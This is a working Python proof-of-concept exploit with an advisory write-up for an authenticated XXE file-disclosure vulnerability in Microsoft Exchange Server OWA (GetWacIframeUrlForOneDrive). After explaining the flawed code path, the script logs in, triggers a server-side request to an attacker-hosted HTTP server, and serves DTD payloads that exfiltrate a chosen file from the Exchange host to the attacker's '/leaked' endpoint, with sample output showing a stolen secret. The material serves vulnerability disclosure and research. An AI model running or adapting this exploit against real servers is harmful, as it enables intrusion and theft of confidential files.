SRC-2020-0030 : Microsoft Exchange Server OWA OneDriveProUtilities GetWacUrl XML External Entity Processing Information Disclosure Vulnerability

#!/usr/bin/env python3
"""
Microsoft Exchange Server OWA OneDriveProUtilities GetWacUrl XML External Entity Processing Information Disclosure Vulnerability
Advisory: https://srcincite.io/advisories/src-2020-0030/
Patched in: https://portal.msrc.microsoft.com/security-guidance/advisory/CVE-2020-17143

## Summary

This vulnerability allows remote attackers to disclose information on affected installations of Exchange Server. Authentication is required to exploit this vulnerability. The specific flaw exists within the processing of the GetWacIframeUrlForOneDrive service command. The issue results from the lack of proper validation of a user-supplied xml. An attacker can leverage this vulnerability to disclose information in the context of SYSTEM.

## Affected

Fully patched version of Exchange 2016 and Exchange 2019 have been confirmed vulnerable

## Vulnerability Analysis

Inside of the `Microsoft.Exchange.Clients.Owa2.Server.dll` library the following class is reachable from an authenticated request:

```
namespace Microsoft.Exchange.Clients.Owa2.Server.Core
{
    internal class GetWacIframeUrlForOneDrive : ServiceCommand{
        public GetWacIframeUrlForOneDrive(ICallContext callContext, GetWacIframeUrlForOneDriveRequest request) : base(callContext)
        {
            this.endPointUrl = request.EndPointUrl;
            this.documentUrl = request.DocumentUrl;
            this.isEdit = request.IsEdit;
        }

        protected override string InternalExecute()  // 1
        {
            UserContext userContext = UserContextManager.GetUserContext(base.CallContext.HttpContext, base.CallContext.EffectiveCaller, true);
            if (userContext == null)
            {
                throw new OwaInvalidRequestException("Unable to determine user context.");
            }
            string wacUrl;
            try
            {
                this.endPointUrl = this.GetEndpointUrl(this.endPointUrl, this.documentUrl, userContext);  // 2
                wacUrl = OneDriveProUtilities.GetWacUrl(base.CallContext, userContext.MailboxIdentity, this.endPointUrl, this.documentUrl, this.isEdit, userContext.FeaturesManager);  // 4
            }
            catch (Exception ex)
            {
                ex.ToString();
                throw;
            }
            return wacUrl;
        }

        private string GetEndpointUrl(string endpointUrl, string documentUrl, UserContext userContext)
        {
            if (string.IsNullOrEmpty(endpointUrl))
            {
                AttachmentDataProvider defaultUploadDataProvider = userContext.AttachmentDataProviderManager.GetDefaultUploadDataProvider(base.CallContext);
                if (defaultUploadDataProvider != null)
                {
                    endpointUrl = defaultUploadDataProvider.GetEndpointUrlFromItemLocation(documentUrl, false);
                }
            }
            return endpointUrl;  // 3
        }
```

When an authenticated request is made with the `Action: GetWacIframeUrlForOneDrive` header, the above class is instantiated and the `InternalExecute` method is called at *[1]*. At *[2]* code calls `GetEndpointUrl` which returns the attacker supplied `endpointUrl` at *[3]*. Then at *[4]* the code calls `OneDriveProUtilities.GetWacUrl` with the attacker controlled `endPointUrl`.

```
        internal static string GetWacUrl(ICallContext callContext, OwaIdentity identity, string endPointUrl, string documentUrl, bool isEdit, FeaturesManager featuresManager)
        {
            bool isSPGetWacTokenEnabled = featuresManager != null && featuresManager.ServerSettings.SPGetWacToken.Enabled;
            WacUrlInfo wacUrl = OneDriveProUtilities.GetWacUrl(callContext, identity, endPointUrl, documentUrl, isEdit, isSPGetWacTokenEnabled);            // 5
            string text = isEdit ? "OwaEdit" : "OwaView";
            return string.Format("{0}&access_token={1}&access_token_ttl={2}&sc={3}", new object[]
            {
                wacUrl.BaseUrl,
                wacUrl.Token,
                wacUrl.TokenTtl,
                text
            });
        }

        internal static WacUrlInfo GetWacUrl(ICallContext callContext, OwaIdentity identity, string endPointUrl, string documentUrl, bool isEdit, bool isSPGetWacTokenEnabled)
        {
            string actionOrAppId = isEdit ? "2" : "4";
            if (isSPGetWacTokenEnabled)
            {
                actionOrAppId = (isEdit ? "1" : "0");
            }
            string getWacTokenUrlFormat = isSPGetWacTokenEnabled ? "{0}/_api/SP.Utilities.WOPIHostUtility.GetWopiTargetPropertiesByUrl(fileUrl=@p, requestedAction={2})?@p='{1}'" : "{0}/_api/Microsoft.SharePoint.Yammer.WACAPI.GetWacToken(fileUrl=@p, wopiAction={2})?@p='{1}'";
            WebResponse tokenRequestWebResponse = OneDriveProUtilities.GetTokenRequestWebResponse(callContext, identity, getWacTokenUrlFormat, endPointUrl, documentUrl, actionOrAppId, "GetWacToken", "SP.GWT");       // 6
            XmlDocument xmlDocument = new XmlDocument();
            OneDriveProUtilities.EndBudget(callContext);
            xmlDocument.Load(tokenRequestWebResponse.GetResponseStream());              // 7
            
            //..
        }
```

At *[5]* the code calls `OneDriveProUtilities.GetWacUrl` with a different signature and at *[6]* a server-side request forgery is triggered with the attacker supplied URI. The issue is at *[7]* though, where the response from the request is parsed to `XmlDocument.Load` which uses the default entity resolver leading to external entity processing.

## Credit

Steven Seeley of Qihoo 360 Vulcan Team and Chris Anastasio

## Example

```
researcher@incite:~$ ./poc.py
(+) usage: ./poc.py(+) eg: ./poc.py 192.168.75.142 [email protected]:user123# 192.168.75.1:9090 "C:/Users/harryh/secrets.txt"
researcher@incite:~$ ./poc.py 192.168.75.142 [email protected]:user123# 192.168.75.1:9090 "C:/Users/harryh/secrets.txt"
(+) triggered xxe in exchange server!
(+) stolen: /leaked?%3C!%5BCDATA%5Bomgthisisasecret0day%5D%5D%3E
```
"""
import re
import sys
import urllib3
import requests
from threading import Thread
from http.server import BaseHTTPRequestHandler, HTTPServer
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

class xxe(BaseHTTPRequestHandler):
    def log_message(self, format, *args):
        return
    def _set_response(self, d):
        self.send_response(200)
        self.send_header('Content-type', 'application/xml')
        self.send_header('Content-Length', len(d))
        self.end_headers()
    def do_GET(self):
        if "leaked" in self.path:
            print("(+) stolen: %s" % self.path)
            message = "<![CDATA[ <![ INCLUDE[]]> ]]>"
            self._set_response(message)
            self.wfile.write(message.encode('utf-8'))
            self.wfile.write('\n'.encode('utf-8'))
        elif "poc.dtd" in self.path:
            print("(+) triggered xxe in exchange server!")
            message = """
<!ENTITY %% payload "%%start;%%stuff;%%end;">
<!ENTITY %% param1 '<!ENTITY % external SYSTEM "http://%s:%d/leaked?%%payload;">'>
%%param1; %%external;""" % (host, int(port))
            self._set_response(message)
            self.wfile.write(message.encode('utf-8'))
            self.wfile.write('\n'.encode('utf-8'))
        elif "poc.xml" in self.path:
            d = """<!ENTITY %% stuff SYSTEM "file:///%s">
<!ENTITY %% end "]]>">
<!ENTITY %% dtd SYSTEM "http://%s:%d/poc.dtd">
%%dtd;
]>""" % (file, host, int(port))
            self._set_response(d)
            self.wfile.write(d.encode('utf-8'))
            self.wfile.write('\n'.encode('utf-8'))
        return

def main(t, usr, pwd, port):
    server = HTTPServer(('0.0.0.0', port), xxe)
    handlerthr = Thread(target=server.serve_forever, args=())
    handlerthr.daemon = True
    handlerthr.start()
    s = requests.Session()
    d = {
        "destination" : "https://%s/owa" % t,
        "flags" : "",
        "username" : usr,
        "password" : pwd
    }
    s.post("https://%s/owa/auth.owa" % t, data=d, verify=False)
    h = {
        "X-OWA-UrlPostData" : '{"request":{"DocumentUrl":"","EndPointUrl":"http://%s:%d/poc.xml"}}' % (host, port),
        "Action" : "GetWacIframeUrlForOneDrive"
    }
    r = s.post("https://%s/owa/service.svc" % t, headers=h, verify=False)
    assert s.cookies.get(name='X-OWA-CANARY') != None, "(-) couldn't leak the csrf canary!" 
    h["X-OWA-CANARY"] = s.cookies.get(name='X-OWA-CANARY')
    s.post("https://%s/owa/service.svc" % t, headers=h, verify=False)
    
if __name__ == '__main__':
    if len(sys.argv) != 5:
        print("(+) usage: %s" % sys.argv[0])
        print("(+) eg: %s 192.168.75.142 [email protected]:user123# 192.168.75.1:9090 \"C:/Users/harryh/secrets.txt\"" % sys.argv[0])
        sys.exit(-1)
    trgt = sys.argv[1]
    assert ":" in sys.argv[2], "(-) you need a user and password!"
    usr = sys.argv[2].split(":")[0]
    pwd = sys.argv[2].split(":")[1]
    host = sys.argv[3]
    port = 9090
    file = sys.argv[4]
    if ":" in sys.argv[3]: 
        host = sys.argv[3].split(":")[0]
        port = sys.argv[3].split(":")[1]
        assert port.isdigit(), "(-) not a port number!"
    main(trgt, usr, pwd, int(port))